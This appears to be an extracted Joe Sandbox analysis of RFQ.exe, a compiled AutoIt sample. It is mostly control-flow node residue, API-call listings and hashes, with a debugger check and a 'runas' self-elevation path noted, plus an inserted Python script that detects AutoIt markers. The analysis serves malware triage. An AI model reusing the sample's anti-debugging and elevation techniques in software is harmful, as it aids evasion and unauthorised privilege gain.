94362->94365 94362->94366 94368 7aa973 94362->94368 94381 741820 346 API calls 2 library calls 94362->94381 94382 741d10 59 API calls Mailbox 94362->94382 94363->94362 94364->94360 94365->94362 94422 77cc5c 86 API calls 4 library calls 94368->94422 94370 7aa982 94372->94360 94417 
77cc5c 86 API calls 4 library calls 94374->94417 94376->94360 94423 78f8ae 94378->94423 94380 790d19 94380->94360 94381->94362 94382->94362 94384 73fe50 94383->94384 94407 73fe7e 94383->94407 94385 74f4ea 48 API calls 94384->94385 94385->94407 94386 74146e 94387 736eed 48 API calls 94386->94387 94409 73ffe1 94387->94409 94388 73d7f7 48 API calls 94388->94407 94390 740509 94552 77cc5c 86 API calls 4 library calls 94390->94552 94391 74f4ea 48 API calls 94391->94407 94393 750f0a 52 API calls __cinit 94393->94407 94395 7aa246 94400 736eed 48 API calls 94395->94400 94396 7aa922 94396->94360 94397 741473 94551 77cc5c 86 API calls 4 library calls 94397->94551 94398 736eed 48 API calls 94398->94407 94400->94409 94402 7aa873 94402->94360 94403 7aa30e 94403->94409 94549 7697ed InterlockedDecrement 94403->94549 94404 7697ed InterlockedDecrement 94404->94407 94406 7aa973 94553 77cc5c 86 API calls 4 library calls 94406->94553 94407->94386 94407->94388 94407->94390 94407->94391 94407->94393 94407->94395 94407->94397 94407->94398 94407->94403 94407->94404 94407->94406 94407->94409 94411 7415b5 94407->94411 94547 741820 346 API calls 2 library calls 94407->94547 94548 741d10 59 API calls Mailbox 94407->94548 94409->94360 94410 7aa982 94550 77cc5c 86 API calls 4 library calls 94411->94550 94412->94360 94413->94360 94414->94360 94415->94360 94416->94366 94417->94339 94418->94366 94419->94366 94420->94358 94421->94352 94422->94370 94424 73936c 81 API calls 94423->94424 94425 78f8ea 94424->94425 94430 78f92c Mailbox 94425->94430 94459 790567 94425->94459 94427 78f984 Mailbox 94428 78fb8b 94427->94428 94427->94430 94435 73936c 81 API calls 94427->94435 94519 7929e8 48 API calls _memcpy_s 94427->94519 94520 78fda5 60 API calls 2 library calls 94427->94520 94429 78fcfa 94428->94429 94434 78fb95 94428->94434 94523 790688 89 API calls Mailbox 94429->94523 94430->94380 94433 78fd07 94433->94434 94437 78fd13 94433->94437 94472 78f70a 94434->94472 94435->94427 94437->94430 94441 78fbc9 94486 
74ed18 94441->94486 94444 78fbfd 94446 74c050 48 API calls 94444->94446 94445 78fbe3 94521 77cc5c 86 API calls 4 library calls 94445->94521 94449 78fc14 94446->94449 94448 78fbee GetCurrentProcess TerminateProcess 94448->94444 94450 741b90 48 API calls 94449->94450 94458 78fc3e 94449->94458 94452 78fc2d 94450->94452 94451 78fd65 94451->94430 94455 78fd7e FreeLibrary 94451->94455 94453 79040f 105 API calls 94452->94453 94453->94458 94455->94430 94458->94451 94490 741b90 94458->94490 94506 79040f 94458->94506 94522 73dcae 50 API calls Mailbox 94458->94522 94460 73bdfa 48 API calls 94459->94460 94461 790582 CharLowerBuffW 94460->94461 94524 771f11 94461->94524 94465 73d7f7 48 API calls 94466 7905bb 94465->94466 94531 7369e9 48 API calls _memcpy_s 94466->94531 94468 7905d2 94469 73b18b 48 API calls 94468->94469 94470 7905de Mailbox 94469->94470 94471 79061a Mailbox 94470->94471 94532 78fda5 60 API calls 2 library calls 94470->94532 94471->94427 94473 78f725 94472->94473 94477 78f77a 94472->94477 94474 74f4ea 48 API calls 94473->94474 94475 78f747 94474->94475 94476 74f4ea 48 API calls 94475->94476 94475->94477 94476->94475 94478 790828 94477->94478 94479 790a53 Mailbox 94478->94479 94485 79084b _strcat _wcscpy __wsetenvp 94478->94485 94479->94441 94480 73cf93 58 API calls 94480->94485 94481 73d286 48 API calls 94481->94485 94482 73936c 81 API calls 94482->94485 94483 75395c 47 API calls __crtGetStringTypeA_stat 94483->94485 94485->94479 94485->94480 94485->94481 94485->94482 94485->94483 94535 778035 50 API calls __wsetenvp 94485->94535 94488 74ed2d 94486->94488 94487 74edc5 VirtualProtect 94489 74ed93 94487->94489 94488->94487 94488->94489 94489->94444 94489->94445 94491 741cf6 94490->94491 94493 741ba2 94490->94493 94491->94458 94492 741bae 94500 741bb9 94492->94500 94537 74c15c 48 API calls 94492->94537 94493->94492 94495 74f4ea 48 API calls 94493->94495 94496 7a49c4 94495->94496 94497 74f4ea 48 API calls 94496->94497 94505 7a49cf 94497->94505 94498 741c5d 
94498->94458 94499 74f4ea 48 API calls 94501 741c9f 94499->94501 94500->94498 94500->94499 94502 741cb2 94501->94502 94536 732925 48 API calls 94501->94536 94502->94458 94504 74f4ea 48 API calls 94504->94505 94505->94492 94505->94504 94507 790427 94506->94507 94512 790443 94506->94512 94508 7904f8 94507->94508 94509 79044f 94507->94509 94510 79042e 94507->94510 94507->94512 94545 779dc5 103 API calls 94508->94545 94516 73cdb9 48 API calls 94509->94516 94544 777c56 50 API calls _strlen 94510->94544 94511 79051e 94511->94458 94512->94511 94538 751c9d 94512->94538 94516->94512 94517 790438 94518 73cdb9 48 API calls 94517->94518 94518->94512 94519->94427 94520->94427 94521->94448 94522->94458 94523->94433 94526 771f3b __wsetenvp 94524->94526 94525 771f79 94525->94465 94525->94470 94526->94525 94527 771f6f 94526->94527 94528 771ffa 94526->94528 94527->94525 94533 74d37a 60 API calls 94527->94533 94528->94525 94534 74d37a 60 API calls 94528->94534 94531->94468 94532->94471 94533->94527 94534->94528 94535->94485 94536->94502 94537->94500 94539 751ca6 RtlFreeHeap 94538->94539 94540 751ccf __dosmaperr 94538->94540 94539->94540 94541 751cbb 94539->94541 94540->94511 94546 757c0e 47 API calls __getptd_noexit 94541->94546 94543 751cc1 GetLastError 94543->94540 94544->94517 94545->94512 94546->94543 94547->94407 94548->94407 94549->94409 94550->94409 94551->94402 94552->94396 94553->94410 94554 7a19dd 94559 734a30 94554->94559 94556 7a19f1 94579 750f0a 52 API calls __cinit 94556->94579 94558 7a19fb 94560 734a40 __ftell_nolock 94559->94560 94561 73d7f7 48 API calls 94560->94561 94562 734af6 94561->94562 94580 735374 94562->94580 94564 734aff 94587 73363c 94564->94587 94567 73518c 48 API calls 94568 734b18 94567->94568 94593 7364cf 94568->94593 94571 73d7f7 48 API calls 94572 734b32 94571->94572 94599 7349fb 94572->94599 94574 734b43 Mailbox 94574->94556 94575 7361a6 48 API calls 94578 734b3d _wcscat Mailbox __wsetenvp 94575->94578 94576 73ce19 48 API calls 94576->94578 94577 
7364cf 48 API calls 94577->94578 94578->94574 94578->94575 94578->94576 94578->94577 94579->94558 94613 75f8a0 94580->94613 94583 73ce19 48 API calls 94584 7353a7 94583->94584 94615 73660f 94584->94615 94586 7353b1 Mailbox 94586->94564 94588 733649 __ftell_nolock 94587->94588 94622 73366c GetFullPathNameW 94588->94622 94590 73365a 94591 736a63 48 API calls 94590->94591 94592 733669 94591->94592 94592->94567 94594 73651b 94593->94594 94598 7364dd _memcpy_s 94593->94598 94596 74f4ea 48 API calls 94594->94596 94595 74f4ea 48 API calls 94597 734b29 94595->94597 94596->94598 94597->94571 94598->94595 94600 73bcce 48 API calls 94599->94600 94601 734a0a RegOpenKeyExW 94600->94601 94602 7a41cc RegQueryValueExW 94601->94602 94603 734a2b 94601->94603 94604 7a4246 RegCloseKey 94602->94604 94605 7a41e5 94602->94605 94603->94578 94606 74f4ea 48 API calls 94605->94606 94607 7a41fe 94606->94607 94624 7347b7 94607->94624 94610 7a423b 94610->94604 94611 7a4224 94612 736a63 48 API calls 94611->94612 94612->94610 94614 735381 GetModuleFileNameW 94613->94614 94614->94583 94616 75f8a0 __ftell_nolock 94615->94616 94617 73661c GetFullPathNameW 94616->94617 94618 736a63 48 API calls 94617->94618 94619 736643 94618->94619 94620 736571 48 API calls 94619->94620 94621 73664f 94620->94621 94621->94586 94623 73368a 94622->94623 94623->94590 94625 74f4ea 48 API calls 94624->94625 94626 7347c9 RegQueryValueExW 94625->94626 94626->94610 94626->94611 94627 755dfd 94628 755e09 __tzset_nolock 94627->94628 94664 757eeb GetStartupInfoW 94628->94664 94631 755e0e 94666 759ca7 GetProcessHeap 94631->94666 94632 755e66 94633 755e71 94632->94633 94748 755f4d 47 API calls 3 library calls 94632->94748 94667 757b47 94633->94667 94636 755e77 94637 755e82 __RTC_Initialize 94636->94637 94749 755f4d 47 API calls 3 library calls 94636->94749 94688 75acb3 94637->94688 94640 755e91 94641 755e9d GetCommandLineW 94640->94641 94750 755f4d 47 API calls 3 library calls 94640->94750 94707 762e7d GetEnvironmentStringsW 
94641->94707 94644 755e9c 94644->94641 94647 755eb7 94648 755ec2 94647->94648 94751 75115b 47 API calls 3 library calls 94647->94751 94717 762cb4 94648->94717 94651 755ec8 94652 755ed3 94651->94652 94752 75115b 47 API calls 3 library calls 94651->94752 94731 751195 94652->94731 94655 755edb 94657 755ee6 __wwincmdln 94655->94657 94753 75115b 47 API calls 3 library calls 94655->94753 94735 733a0f 94657->94735 94659 755efa 94660 755f09 94659->94660 94754 7513f1 47 API calls _doexit 94659->94754 94755 751186 47 API calls _doexit 94660->94755 94663 755f0e __tzset_nolock 94665 757f01 94664->94665 94665->94631 94666->94632 94756 75123a 30 API calls 2 library calls 94667->94756 94669 757b4c 94757 757e23 InitializeCriticalSectionAndSpinCount 94669->94757 94671 757b51 94672 757b55 94671->94672 94759 757e6d TlsAlloc 94671->94759 94758 757bbd 50 API calls 2 library calls 94672->94758 94675 757b5a 94675->94636 94676 757b67 94676->94672 94677 757b72 94676->94677 94760 756986 94677->94760 94680 757bb4 94768 757bbd 50 API calls 2 library calls 94680->94768 94683 757b93 94683->94680 94685 757b99 94683->94685 94684 757bb9 94684->94636 94767 757a94 47 API calls 4 library calls 94685->94767 94687 757ba1 GetCurrentThreadId 94687->94636 94689 75acbf __tzset_nolock 94688->94689 94777 757cf4 94689->94777 94691 75acc6 94692 756986 __calloc_crt 47 API calls 94691->94692 94693 75acd7 94692->94693 94694 75ad42 GetStartupInfoW 94693->94694 94695 75ace2 __tzset_nolock @_EH4_CallFilterFunc@8 94693->94695 94702 75ae80 94694->94702 94704 75ad57 94694->94704 94695->94640 94696 75af44 94784 75af58 LeaveCriticalSection _doexit 94696->94784 94698 75aec9 GetStdHandle 94698->94702 94699 756986 __calloc_crt 47 API calls 94699->94704 94700 75aedb GetFileType 94700->94702 94701 75ada5 94701->94702 94705 75ade5 InitializeCriticalSectionAndSpinCount 94701->94705 94706 75add7 GetFileType 94701->94706 94702->94696 94702->94698 94702->94700 94703 75af08 InitializeCriticalSectionAndSpinCount 94702->94703 
[Execution graph residue omitted: this part of the report is rendered as an interactive control-flow graph, and the extracted text consists only of node IDs (94703 through 95976) joined by "->" edges. Node labels carry a function address in the 0x733xxx to 0x7a9xxx range and, where resolved, the imported Windows API name (e.g. GetModuleFileNameW, IsDebuggerPresent, SetUnhandledExceptionFilter, LoadLibraryA/GetProcAddress, FindResourceExW/LoadResource/LockResource, CreateStreamOnHGlobal, AllocateAndInitializeSid/CheckTokenMembership, ShellExecuteW, Shell_NotifyIconW) or a CRT helper (e.g. __malloc_crt, _free, __lock, __wsetenvp).]
95973 7433ce 95978 743465 95973->95978 95979 7a945e 95973->95979 95973->95989 96253 731caa 49 API calls 95975->96253 95988 7a9128 95976->95988 95998 7a9152 95976->95998 95977 73d764 55 API calls 95977->95989 95984 74f4ea 48 API calls 95978->95984 96261 77c942 50 API calls 95979->96261 95980 73d9a0 53 API calls 95980->95989 95985 7a9438 95981->95985 96004 74346c 95984->96004 96260 77cc5c 86 API calls 4 library calls 95985->96260 95986 7a923d 95992 7a925e 95986->95992 95993 7a9252 95986->95993 95987 73fe30 346 API calls 95987->95989 96248 77cc5c 86 API calls 4 library calls 95988->96248 95989->95966 95989->95967 95989->95977 95989->95980 95989->95985 95989->95987 95991 74c3c3 48 API calls 95989->95991 96007 74f4ea 48 API calls 95989->96007 96010 74351f 95989->96010 96012 7a9394 95989->96012 96016 7a93c5 95989->96016 95989->96022 96244 73d8c0 53 API calls 95989->96244 96245 74c2d6 48 API calls _memcpy_s 95989->96245 96257 78cda2 82 API calls Mailbox 95989->96257 96258 7780e3 53 API calls 95989->96258 96259 73dcae 50 API calls Mailbox 95989->96259 95991->95989 96255 77cc5c 86 API calls 4 library calls 95992->96255 96254 77cc5c 86 API calls 4 library calls 95993->96254 95999 7a9177 95998->95999 96002 7a9195 95998->96002 96249 78f320 346 API calls 95999->96249 96003 7a918b 96002->96003 96250 78f5ee 346 API calls 96002->96250 96003->96022 96251 74c2d6 48 API calls _memcpy_s 96003->96251 96006 73e8d0 346 API calls 96004->96006 96004->96010 96006->95989 96007->95989 96252 77cc5c 86 API calls 4 library calls 96009->96252 96011 736eed 48 API calls 96010->96011 96013 743540 96010->96013 96011->96013 96014 74f4ea 48 API calls 96012->96014 96017 7a94b0 96013->96017 96020 743585 96013->96020 96013->96022 96014->96016 96016->95968 96262 73dcae 50 API calls Mailbox 96017->96262 96019 743615 96243 73dcae 50 API calls Mailbox 96019->96243 96020->95960 96020->96019 96020->96022 96023 743635 Mailbox 96022->96023 96246 77cc5c 86 API calls 4 library calls 96022->96246 96023->95087 
96024->95087 96025->95087 96026->95031 96027->95035 96028->95040 96029->95087 96030->95087 96031->95083 96032->95083 96033->95083 96034->95083 96035->95083 96036->95083 96037->95868 96038->95917 96039->95877 96040->95918 96041->95917 96042->95905 96043->95894 96044->95913 96045->95924 96046->95930 96047->95932 96048->95930 96049->95917 96050->95917 96051->95917 96052->95916 96053->95905 96054->95905 96055->95912 96056->95905 96057->95905 96058->95917 96060 7a6e60 96059->96060 96063 74432c 96059->96063 96124 77cc5c 86 API calls 4 library calls 96060->96124 96062 7a6e71 96125 77cc5c 86 API calls 4 library calls 96062->96125 96063->96062 96070 744366 _memcpy_s 96063->96070 96065 744435 96071 744445 96065->96071 96123 78cda2 82 API calls Mailbox 96065->96123 96066 74f4ea 48 API calls 96066->96070 96068 7444b1 96068->95945 96069 73fe30 346 API calls 96069->96070 96070->96065 96070->96066 96070->96069 96070->96071 96072 7a6ebd 96070->96072 96071->95945 96126 77cc5c 86 API calls 4 library calls 96072->96126 96127 776ca9 GetFileAttributesW 96074->96127 96078 77fa1c __ftell_nolock 96077->96078 96079 77fa44 96078->96079 96192 73d286 48 API calls 96078->96192 96081 73936c 81 API calls 96079->96081 96082 77fa5e 96081->96082 96083 77fa80 96082->96083 96084 77fb68 96082->96084 96094 77fb92 96082->96094 96085 73936c 81 API calls 96083->96085 96086 7341a9 136 API calls 96084->96086 96092 77fa8c _wcscpy _wcschr 96085->96092 96087 77fb79 96086->96087 96088 77fb8e 96087->96088 96090 7341a9 136 API calls 96087->96090 96089 73936c 81 API calls 96088->96089 96088->96094 96091 77fbc7 96089->96091 96090->96088 96093 751dfc __wsplitpath 47 API calls 96091->96093 96097 77fab0 _wcscat _wcscpy 96092->96097 96100 77fade _wcscat 96092->96100 96102 77fbeb _wcscat _wcscpy 96093->96102 96094->95942 96095 73936c 81 API calls 96096 77fafc _wcscpy 96095->96096 96193 7772cb GetFileAttributesW 96096->96193 96098 73936c 81 API calls 96097->96098 96098->96100 96100->96095 96101 77fb1c __wsetenvp 
96101->96094 96103 73936c 81 API calls 96101->96103 96106 73936c 81 API calls 96102->96106 96104 77fb48 96103->96104 96194 7760dd 77 API calls 4 library calls 96104->96194 96108 77fc82 96106->96108 96107 77fb5c 96107->96094 96131 77690b 96108->96131 96110 77fca2 96111 776524 3 API calls 96110->96111 96112 77fcb1 96111->96112 96113 73936c 81 API calls 96112->96113 96116 77fce2 96112->96116 96114 77fccb 96113->96114 96137 77bfa4 96114->96137 96117 734252 84 API calls 96116->96117 96117->96094 96119 78f8ae 129 API calls 96118->96119 96120 790d2d 96119->96120 96120->95942 96121->95943 96122->95942 96123->96068 96124->96062 96125->96071 96126->96071 96128 776529 96127->96128 96129 776cc4 FindFirstFileW 96127->96129 96128->95942 96129->96128 96130 776cd9 FindClose 96129->96130 96130->96128 96132 776918 _wcschr __ftell_nolock 96131->96132 96133 751dfc __wsplitpath 47 API calls 96132->96133 96136 77692e _wcscat _wcscpy 96132->96136 96134 77695d 96133->96134 96135 751dfc __wsplitpath 47 API calls 96134->96135 96135->96136 96136->96110 96138 77bfb1 __ftell_nolock 96137->96138 96139 74f4ea 48 API calls 96138->96139 96140 77c00e 96139->96140 96141 7347b7 48 API calls 96140->96141 96142 77c018 96141->96142 96143 77bdb4 GetSystemTimeAsFileTime 96142->96143 96144 77c023 96143->96144 96145 734517 83 API calls 96144->96145 96146 77c036 _wcscmp 96145->96146 96147 77c107 96146->96147 96148 77c05a 96146->96148 96149 77c56d 94 API calls 96147->96149 96150 77c56d 94 API calls 96148->96150 96165 77c0d3 _wcscat 96149->96165 96151 77c05f 96150->96151 96152 751dfc __wsplitpath 47 API calls 96151->96152 96155 77c110 96151->96155 96157 77c088 _wcscat _wcscpy 96152->96157 96153 7344ed 64 API calls 96154 77c12c 96153->96154 96156 7344ed 64 API calls 96154->96156 96155->96116 96158 77c13c 96156->96158 96160 751dfc __wsplitpath 47 API calls 96157->96160 96159 7344ed 64 API calls 96158->96159 96161 77c157 96159->96161 96160->96165 96162 7344ed 64 API calls 96161->96162 96163 77c167 96162->96163 
96164 7344ed 64 API calls 96163->96164 96166 77c182 96164->96166 96165->96153 96165->96155 96167 7344ed 64 API calls 96166->96167 96168 77c192 96167->96168 96169 7344ed 64 API calls 96168->96169 96170 77c1a2 96169->96170 96171 7344ed 64 API calls 96170->96171 96172 77c1b2 96171->96172 96195 77c71a GetTempPathW GetTempFileNameW 96172->96195 96174 77c1be 96175 753499 117 API calls 96174->96175 96186 77c1cf 96175->96186 96176 77c289 96177 7535e4 __fcloseall 83 API calls 96176->96177 96178 77c294 96177->96178 96179 7344ed 64 API calls 96179->96186 96186->96155 96186->96176 96186->96179 96196 752aae 96186->96196 96192->96079 96193->96101 96194->96107 96195->96174 96197 752aba __tzset_nolock 96196->96197 96231 73bd3f 96230->96231 96234 73bd5a 96230->96234 96232 73bdfa 48 API calls 96231->96232 96233 73bd47 CharUpperBuffW 96232->96233 96233->96234 96234->95954 96236 7a436a 96235->96236 96237 732b8b 96235->96237 96238 74f4ea 48 API calls 96237->96238 96239 732b92 96238->96239 96240 732bb3 96239->96240 96264 732bce 48 API calls 96239->96264 96240->95973 96242->95962 96243->96022 96244->95989 96245->95989 96246->96023 96247->95962 96248->96022 96249->96003 96250->96003 96251->96009 96252->96022 96253->95986 96254->96022 96255->96022 96256->96022 96257->95989 96258->95989 96259->95989 96260->96022 96261->96010 96262->95960 96263->96022 96264->96240 96265 7a9c06 96276 74d3be 96265->96276 96267 7a9c1c 96268 7a9c91 Mailbox 96267->96268 96285 731caa 49 API calls 96267->96285 96271 743200 346 API calls 96268->96271 96270 7a9c71 96273 7a9cc5 96270->96273 96286 77b171 48 API calls 96270->96286 96271->96273 96274 7aa7ab Mailbox 96273->96274 96287 77cc5c 86 API calls 4 library calls 96273->96287 96277 74d3dc 96276->96277 96278 74d3ca 96276->96278 96280 74d3e2 96277->96280 96281 74d40b 96277->96281 96288 73dcae 50 API calls Mailbox 96278->96288 96282 74f4ea 48 API calls 96280->96282 96289 73dcae 50 API calls Mailbox 96281->96289 96284 74d3d4 96282->96284 96284->96267 96285->96270 
96286->96268 96287->96274 96288->96284 96289->96284

Control-flow Graph

Control-flow graph for the function at 75b043 (executed and not-executed blocks are marked in the original rendering; node/edge data not reproduced). The graph's blocks call GetConsoleMode, GetConsoleCP, WriteFile, WideCharToMultiByte and GetLastError.
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 414e070471a0c3e4b51d18f604061e06f68f4c1aeb2fbc89d431554db446401c
                                                                                                                                                    • Instruction ID: ebf99d8c0d6f378b4796928b023b40d9f0298868db57bd0c399b7cc5149c50ed
                                                                                                                                                    • Opcode Fuzzy Hash: 414e070471a0c3e4b51d18f604061e06f68f4c1aeb2fbc89d431554db446401c
                                                                                                                                                    • Instruction Fuzzy Hash: 23328075B022188FCB24CF14DC856E9B7B5FF4A311F1841D9E80AA7A81D7789E84CF92

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00733AA3,?), ref: 00733D45
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00733AA3,?), ref: 00733D57
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,007F1148,007F1130,?,?,?,?,00733AA3,?), ref: 00733DC8
                                                                                                                                                      • Part of subcall function 00736430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00733DEE,007F1148,?,?,?,?,?,00733AA3,?), ref: 00736471
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00733AA3,?), ref: 00733E48
                                                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007E28F4,00000010), ref: 007A1CCE
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,007F1148,?,?,?,?,?,00733AA3,?), ref: 007A1D06
                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007CDAB4,007F1148,?,?,?,?,?,00733AA3,?), ref: 007A1D89
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00733AA3), ref: 007A1D90
                                                                                                                                                      • Part of subcall function 00733E6E: GetSysColorBrush.USER32(0000000F), ref: 00733E79
                                                                                                                                                      • Part of subcall function 00733E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00733E88
                                                                                                                                                      • Part of subcall function 00733E6E: LoadIconW.USER32(00000063), ref: 00733E9E
                                                                                                                                                      • Part of subcall function 00733E6E: LoadIconW.USER32(000000A4), ref: 00733EB0
                                                                                                                                                      • Part of subcall function 00733E6E: LoadIconW.USER32(000000A2), ref: 00733EC2
                                                                                                                                                      • Part of subcall function 00733E6E: RegisterClassExW.USER32(?), ref: 00733F30
                                                                                                                                                      • Part of subcall function 007336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007336E6
                                                                                                                                                      • Part of subcall function 007336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733707
                                                                                                                                                      • Part of subcall function 007336B8: ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 0073371B
                                                                                                                                                      • Part of subcall function 007336B8: ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 00733724
                                                                                                                                                      • Part of subcall function 00734FFC: _memset.LIBCMT ref: 00735022
                                                                                                                                                      • Part of subcall function 00734FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007350CB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                    • String ID: ()~$This is a third-party compiled AutoIt script.$runas
                                                                                                                                                    • API String ID: 438480954-284739447
                                                                                                                                                    • Opcode ID: fdbe6b19c6a018316dc3ca8ac048c0a7f12f17fbf62f8d21efdd733759665f6a
                                                                                                                                                    • Instruction ID: a01b79f278746d50b5430b5d2606afcd84b83c5f97d5832cf339c97db59e72b1
                                                                                                                                                    • Opcode Fuzzy Hash: fdbe6b19c6a018316dc3ca8ac048c0a7f12f17fbf62f8d21efdd733759665f6a
                                                                                                                                                    • Instruction Fuzzy Hash: 82510531A4424CEAEB21EBB1DC49EFE7B799B15700F408164F641A31A3DA7C4A05CB25
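A triage check built from the API and string list for this function, added here as an example and not part of the Joe Sandbox report or of AutoIt itself: it scans a raw PE image for the three strings the report attributes to this function and its subcalls (the MessageBoxA banner, the "AutoIt v3" window class passed to CreateWindowExW, and the runas string listed for the ShellExecuteW call sequence) and decides whether the image looks like a compiled-AutoIt stub. The encoding chosen per string (ANSI for MessageBoxA, UTF-16LE for the W-suffixed APIs), the rule that banner plus window class identifies the stub, and the two sample byte blobs are my own assumptions and constructions, not data taken from RFQ.exe.

```python
"""Triage helper: flag a PE image that carries the compiled-AutoIt runtime
markers listed in the report above. Added example, not part of the report.

Assumptions (mine, not stated on the page): the marker strings below are the
ones the report attributes to this function and its subcalls, and a clean
binary does not normally contain the banner and window class together.
Treat the verdict as a triage hint, not proof. The sample bytes at the bottom
are constructed and are not taken from RFQ.exe.
"""
import re
from dataclasses import dataclass, field

# Markers from the API/String list above. Encoding follows the API that
# consumed each string: MessageBoxA takes ANSI, ShellExecuteW and
# CreateWindowExW take UTF-16LE.
MARKERS = {
    "autoit_banner": (b"This is a third-party compiled AutoIt script.", "ansi"),
    "autoit_window_class": ("AutoIt v3".encode("utf-16-le"), "utf-16-le"),
    "runas_verb": ("runas".encode("utf-16-le"), "utf-16-le"),
}


@dataclass
class TriageResult:
    hits: dict = field(default_factory=dict)  # marker name -> list of offsets

    @property
    def is_compiled_autoit(self) -> bool:
        # Assumption: banner + window class together identify the AutoIt stub;
        # the runas verb alone is too common to count towards this verdict.
        return {"autoit_banner", "autoit_window_class"} <= set(self.hits)

    @property
    def elevation_path_present(self) -> bool:
        # The report shows runas next to ShellExecuteW, i.e. a self-elevation path.
        return "runas_verb" in self.hits


def scan_image(data: bytes) -> TriageResult:
    """Locate every marker in a raw image and record its file offsets."""
    result = TriageResult()
    for name, (needle, _encoding) in MARKERS.items():
        offsets = [m.start() for m in re.finditer(re.escape(needle), data)]
        if offsets:
            result.hits[name] = offsets
    return result


def triage_file(path: str) -> TriageResult:
    """Read a file from disk and scan it; path is supplied by the caller."""
    with open(path, "rb") as fh:
        return scan_image(fh.read())


# Constructed sample images (not real PE files): one mimicking the string
# layout of an AutoIt stub, one a benign-looking blob that only carries runas.
SAMPLE_AUTOIT = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 32
    + b"This is a third-party compiled AutoIt script.\x00"
    + b"\x00" * 16 + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 8 + "runas".encode("utf-16-le") + b"\x00\x00"
)
SAMPLE_CLEAN = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + "runas".encode("utf-16-le")


if __name__ == "__main__":
    for label, blob in (("autoit-like", SAMPLE_AUTOIT), ("clean-like", SAMPLE_CLEAN)):
        r = scan_image(blob)
        print(f"{label}: compiled_autoit={r.is_compiled_autoit} "
              f"runas={r.elevation_path_present} hits={r.hits}")
```

Run it directly to see the verdict on the two constructed blobs, or call triage_file(path) on a real sample. A hit on runas alone is deliberately not a verdict: that verb is common in legitimate installers, so the example keeps the elevation-path flag separate from the AutoIt check and reports the offsets so an analyst can confirm each hit in a hex view.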

Control-flow Graph

Control-flow graph for the function at 74ddc0 (executed and not-executed blocks are marked in the original rendering; node/edge data not reproduced). The graph's blocks call GetVersionExW, GetCurrentProcess, GetNativeSystemInfo, GetSystemInfo and FreeLibrary.
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0074DDEC
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,007CDC38,?,?), ref: 0074DEAC
                                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,007CDC38,?,?), ref: 0074DF01
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0074DF0C
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0074DF1F
                                                                                                                                                    • GetSystemInfo.KERNEL32(?,007CDC38,?,?), ref: 0074DF29
                                                                                                                                                    • GetSystemInfo.KERNEL32(?,007CDC38,?,?), ref: 0074DF35
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
